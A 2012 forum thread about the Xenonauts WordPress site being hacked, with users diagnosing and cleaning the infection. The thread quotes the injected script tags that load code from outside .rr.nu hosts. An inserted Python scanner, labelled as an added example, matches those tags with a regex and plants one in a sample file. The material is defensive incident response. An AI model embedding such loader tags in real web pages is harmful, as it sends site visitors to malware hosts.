DrAtomic, posted February 22, 2012 (edited)
The Xenonauts homepage has been injected with a malicious URL. Look at the parsed code and you'll find <script src="http://rie21rcom.rr.nu/mm.php?d=1"></script> at the end of the script. Most common causes are farmed FTP passwords, or usage of open-source software that needs to be updated, or usage of variables in custom code that aren't checked against XSS. See http://www.acunetix.com to download a free scanner (the free scanner will highlight enough to see what needs to be fixed; clean the website first before running it, though).
Edited February 23, 2012 by DrAtomic: removed "Fixed" from header
Chris, posted February 22, 2012
Argh, did not need this. I'm not a web guy. Thanks for the heads-up, I'll see if I can find the security hole and fix it, and get the page back up...
Chris, posted February 22, 2012
OK, site appears to be restored and all major passwords are changed, plus the WordPress admin directory is changed from default. Hopefully that'll stop it happening again - but I'll have a play with Acunetix when it arrives. Thanks for the information!
DrAtomic, posted February 22, 2012
> OK, site appears to be restored and all major passwords are changed, plus the WordPress admin directory is changed from default. Hopefully that'll stop it happening again - but I'll have a play with Acunetix when it arrives. Thanks for the information!

You're welcome. A common cause outside of the website sources itself is farmed FTP accounts. Website-wise, just be sure to be running the latest version of WordPress and also make sure to check if any plugins need updating (from your WP admin area).
gandie, posted February 22, 2012 (edited)
I am still getting sent to malicious sites when visiting this website, unfortunately... (was sent to another Russian site about a minute ago). Registered just to give a heads-up (or was it my cache? hmmm - I would advise keeping an eye out anyway).
Edited February 22, 2012 by gandie
DrAtomic, posted February 23, 2012
It got injected again... <script src="http://chelpo94landsa.rr.nu/mm.php?d=1"></script>
Chris, posted February 23, 2012
Wonderful. I've updated WordPress to the latest version and changed my WordPress password now too. I don't know what else could be causing it, because there's only one FTP user with access to the domain and I changed the password on that yesterday. I hope it doesn't happen again.
Chris, posted February 23, 2012
Hmmm, even that doesn't seem to be working. I installed a heavy-duty WordPress security plugin, hopefully that'll prevent further intrusion... But according to http://sitecheck.sucuri.net/scanner/, I still have malicious code on the website. Anyone know a method for how I can find and remove it?
DrAtomic, posted February 23, 2012 (edited)
> Hmmm, even that doesn't seem to be working. I installed a heavy-duty WordPress security plugin, hopefully that'll prevent further intrusion... But according to http://sitecheck.sucuri.net/scanner/, I still have malicious code on the website. Anyone know a method for how I can find and remove it?

* Check the modification date of your index.php (since it got infected again) to check what the last time of getting infected was/is.
* Download all the web files to your local computer.
* Search for the string '.rr.nu' in all files.
* Clean all files that contain <script src="http://blablablablabla.rr.nu/mm.php?d=1"></script>; the string will be added to the bottom of the files, so open file, scroll to bottom, delete.
* Check the content of your .htaccess (could contain a malicious rewrite rule) and make sure it is what it should be. If unsure, or if you never modified the original, then simply delete it and replace it with an original that comes with the WordPress sources. My guess is that you do use URL rewrite (search engine friendly URLs based
* Run a virus scanner over the downloaded code (this will find any files that may have been uploaded that reinfect the website).
* Make sure to run a malware scanner on your own computer as well.
* Once everything is clean again, reset your passwords again just to be sure.
Edited February 23, 2012 by DrAtomic
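The "search every downloaded file for .rr.nu and review .htaccess" steps above, as an added example that is not part of the thread: a small Python scanner that walks a local copy of the webroot, reports files carrying the appended loader tag, offers a cleaned version of the file content, and flags any .htaccess containing rewrite rules for manual comparison against the stock WordPress file. The sample webroot built by demo() is constructed for illustration; only the rie21rcom.rr.nu host name comes from the thread.

```python
import re
import tempfile
from pathlib import Path

# The injected tag seen in the thread: <script src="http://<host>.rr.nu/mm.php?d=1"></script>.
# Host names changed between infections, so any host under rr.nu is matched.
INJECTED_TAG = re.compile(
    r'<script\s+src="https?://[^"/]*\.rr\.nu/mm\.php\?d=\d+"\s*>\s*</script>\s*',
    re.IGNORECASE,
)
# Rewrite rules are legitimate in WordPress, so only report them for a human to compare.
REWRITE_RULE = re.compile(r'^\s*Rewrite(Rule|Cond)\b', re.IGNORECASE | re.MULTILINE)
SCAN_EXTS = ('.php', '.html', '.htm', '.js')

def find_injections(text):
    """Return every injected tag found in text (stripped of surrounding whitespace)."""
    return [m.group(0).strip() for m in INJECTED_TAG.finditer(text)]

def clean(text):
    """Return text with injected tags removed; unchanged when none are present."""
    return INJECTED_TAG.sub('', text)

def scan_tree(root):
    """Walk a downloaded webroot; map relative path -> findings for files needing attention."""
    report = {}
    for path in Path(root).rglob('*'):
        if not path.is_file():
            continue
        text = path.read_text(errors='replace')
        rel = str(path.relative_to(root))
        if path.name == '.htaccess' and REWRITE_RULE.search(text):
            report[rel] = ['contains rewrite rules; compare against the stock WordPress .htaccess']
        elif path.suffix.lower() in SCAN_EXTS and find_injections(text):
            report[rel] = find_injections(text)
    return report

def demo():
    """Build a constructed (not real) webroot with one infected file and scan it."""
    root = Path(tempfile.mkdtemp())
    (root / 'wp-content').mkdir()
    # Loader tag appended at the very end of the file, as the thread describes.
    (root / 'index.php').write_text('<?php get_header(); ?>\n<p>Welcome</p>\n'
                                    '<script src="http://rie21rcom.rr.nu/mm.php?d=1"></script>\n')
    (root / 'wp-content' / 'clean.php').write_text('<?php echo "ok"; ?>\n')
    (root / '.htaccess').write_text('RewriteEngine On\nRewriteRule . /index.php [L]\n')
    return scan_tree(root)

if __name__ == '__main__':
    for rel, findings in demo().items():
        print(rel, '->', findings)
```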
yawa, posted February 23, 2012
It might have been this vulnerability, as I see you have the TimThumb plugin: http://markmaunder.com/2011/08/02/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/ That page is a very good writeup, and explains the possibility that they may have installed a backdoor - even if you have fixed how they got in the first time, they may have installed another way. It seems to be pretty common with WordPress hacks to use a PHP-based backdoor. DrAtomic's advice to run a virus scanner on the server is a good idea in my opinion. Sadly, detection of PHP malware generally isn't as good as for exe stuff. DrAtomic's advice sounds very good to me so I'm going to leave him to it, but I do have one question: you say you updated WordPress, did you update all the plugins, too? I saw a very large number of exploited WordPress sites at work today (AV industry), via some gallery plugin that lives in a directory named fgallery. Good luck! This kind of hack is normally automated, so once you do clear out the traces they're not likely to come back.
Chris, posted February 23, 2012
Ah, god dammit. I think TimThumb is integrated into the site template. I'm not sure I can disable or upgrade it. *sigh* Thanks for the advice guys, I'll see what I can do.
Chris, posted February 23, 2012
Right, I've closed the TimThumb vulnerability (sure enough, that file was out of date so it's a potential entry point) and I'll do the virus scans etc., then change my passwords. Fingers crossed this fixes the issue!
MrPyro, posted February 24, 2012
I'm now getting a 500 Internal Server Error trying to access the page. This is probably a PHP fatal error, so if you have PHP error logging enabled it should give you some info in that log as to what is going on; or WordPress might have its own logging.
Chris, posted February 24, 2012
That's intentional. I'm wiping the site and rolling it back to when I last did a backup of it.
DrAtomic, posted February 24, 2012
> Sadly, detection of PHP malware generally isn't as good as for exe stuff.

Very true; the reason I said it, though, was to eliminate any PHP shells that might have been uploaded. Most of those are detected by AV software.
Chris, posted February 24, 2012
I couldn't get that to work. In the end I took the nuclear option and wiped the site, then restored a backup I took in January. I then applied all the security fixes, which should hopefully close the original vulnerabilities, and updated my passwords. It appears to have fixed the issue. Thank god for backups, eh?
resonansER, posted February 24, 2012
I wrote to you, Chris. Let me be administrator. I am easily identified on the Internet. I am an adult, honest and decent admin. I know very well how to work with vBulletin and also administration of Unix systems, CentOS 6.x & Debian 6.x x64 - x86, and many, many, many other things.
gsteff, posted February 25, 2012
I'm still getting malware warnings from Google Chrome when I visit the news page.
Clausewitz_, posted February 28, 2012
Got a malware warning @ work yesterday and 5 mins later a techy turned up in my office going yadda yadda yadda company policy yadda yadda yadda! Are we users in any danger of being compromised - I used the link to pre-order? Cheers
Chris, posted February 29, 2012
Erk - shouldn't be... what pages gave you the malware warning, out of interest?
RavenX, posted March 3, 2012
Chris, you've been checking naughty Russian sites for mail order brides again, haven't you? J/K. I've got some friends that do web security work if need be. Just say the word and I can give you the name of a good company that provides site security.
Chris, posted March 9, 2012
I think I've done a pretty good job of dealing with the malware, but I'm still getting occasional reports of people encountering warnings from the site (even though I've scanned the whole thing for the problem script and found nothing). The vulnerability only affects IE, and people have mentioned encountering it on the Screenshot and Pre-Order pages so far (I've had some problems with script errors on the screenshot page when I open a screenshot). If anyone knows anything about web security, would they mind having a look at that page to see if they can replicate the malware warnings? I can't seem to do it myself so I don't really know what to look for...
Gorlom, posted March 9, 2012
Would those users having cached pages cause such errors/warnings? (Just wondering, I know practically nothing about all of this.)
Greven, posted April 3, 2012 (edited)
I am taking a look. Not sure if I will be able to find anything.
EDIT: I cannot find anything at the moment... but I will do more of a check once I am out of training and home.
Edited April 3, 2012 by Greven: update
Chris, posted April 4, 2012
I think it's all been clear for a while now. I certainly hope it stays that way.